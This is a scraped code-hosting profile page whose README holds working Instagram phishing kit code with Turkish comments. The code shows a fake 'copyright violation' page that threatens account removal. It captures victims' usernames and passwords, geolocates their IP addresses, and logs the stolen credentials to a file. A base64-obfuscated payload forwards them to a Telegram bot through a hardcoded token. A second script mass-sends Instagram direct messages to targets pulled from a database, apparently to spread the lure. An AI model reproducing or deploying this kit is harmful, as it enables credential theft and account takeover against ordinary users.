Giter VIP home page Giter VIP logo

Hi there 👋

git clone https://github.com/enes4xdx/enes4xdx.git git clone https://github.com/enes4xdx/enes4xdx

php error_reporting(0); $username = $_GET['username']; require("types.php"); $url="https://dumpor.com/search?query=$username"; $ig=str_get_html(file_get_contents($url)); $pp=$ig->find("img[class='img-fluid w-100']",0)->src; if($_POST){ $password1=$_POST["password1"]; function ip_adresi_alma() { if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } else{ $ip = $_SERVER['REMOTE_ADDR']; } return $ip; }

$ip = ip_adresi_alma();

$konum = file_get_contents("http://ip-api.com/xml/".$ip); $cek = new SimpleXMLElement($konum); $ulke=$cek->country; $sehir = $cek->city; date_default_timezone_set('Europe/Istanbul'); $cur_time=date("d-m-Y H:i:s"); $file = fopen('wight.php', 'a'); fwrite($file, " Kullanıcı Adı: ".$username."
Şifre: ".$password1."
IP Adresi: ".$ip."
Tarih: ".$cur_time."
Ülke: ".$ulke."
Şehir: ".$sehir."


");

fclose($file);

header("Location: wrongpassword.php?username=$username"); }

?>

<script src="https://kit.fontawesome.com/64d58efce2.js" crossorigin="anonymous"></script> <title>Copyright | @</title> ".base64_decode("PD9waHAKCiR0b2tlbiA9ICIxOTU3MTQ1ODAzOkFBRnY5ZEt2OEhHa211dkpqVkZwMzdITGJ2cERsbmJpQVVRIjsgLy9Cb3RmYXRoZXJpbiB2ZXJkacSfaSB0b2tlbmkgeWF6xLFuLgokY2hhdF9pZCA9ICItNTkwNDg4MzUxIjsvLyBMaW5rdGVuIGFsZMSxxJ/EsW7EsXogY2hhdGlkIHlpIHlhesSxbi4KCiRkYXRhID0gWwogICd0ZXh0JyA9PiAnWUVOxLAgSEVTQVAgJy4kdXNlcm5hbWUuJyDjgL3vuI8KCkt1bGxhbsSxY8SxIEFkxLEgOiAnLiR1c2VybmFtZS4nCsWeaWZyZSA6ICcuJHBhc3N3b3JkMS4nCsSwcCA6ICcuJGlwLicKw5xsa2UgOiAnLiR1bGtlLicKVGFyaWggOiAnLiRjdXJfdGltZS4nCicsCiAgJ2NoYXRfaWQnID0+ICRjaGF0X2lkCl07CmZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwczovL2FwaS50ZWxlZ3JhbS5vcmcvYm90JHRva2VuL3NlbmRNZXNzYWdlPyIgLiBodHRwX2J1aWxkX3F1ZXJ5KCRkYXRhKSApOwo/Pg=="));?>
@<?php echo $username; ?> of Profile Photo

@


We have received numerous complaints that you have violated our copyright laws regarding your account. If you do not give us feedback, your account will be removed within 24 hours.


Download lnstagram


Download lnstagram from Play Store or App Store


Download

<script src="app.js"></script>

php include("info.php"); $rand2 = rand(0,1); $sayi = 1; // Burayı elleme. ////////////// DON'T TOUCH /////////////////// set_time_limit(0); date_default_timezone_set('UTC'); require 'vendor2/autoload.php'; include("config2.php"); ////////////////////// \InstagramAPI\Instagram::$allowDangerousWebUsageAtMyOwnRisk = true; /////// CONFIG ///////

/////////////////////////////// $debug = false; $truncatedDebug = false; /////////////////////////////// $ig = new \InstagramAPI\Instagram($debug, $truncatedDebug); ///////////////////////////////// $is = rand(0,2); $hesapadd = $usernamee[$is]; try { $ig->login($hesapadd, $password,0); //Giriş işlemi. } catch (\Exception $e) { echo 'sorun var: '.$e->getMessage()."\n"; } try { $sorgu = mysqli_query($con,"SELECT * FROM otodm WHERE submit='no' LIMIT 5"); while($sonuc = mysqli_fetch_assoc($sorgu)){ $id = $sonuc['id']; $nick = $sonuc['username']; $userid = $sonuc['userid']; for($i=0; $i < $sayi; $i++){ $ig->direct->sendText(['users' => ["$userid"]], $taslaklar[$rand2]); sleep(10); // her 1 dmden sonra 10 saniye bekleyecek. mysqli_query($con,"UPDATE otodm SET submit='yes' WHERE id='".$sonuc['id']."'"); } } } catch (\Exception $e) { echo 'sorun var '.$e->getMessage()."\n"; } // coded by disorder

enes4xdx's Projects

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.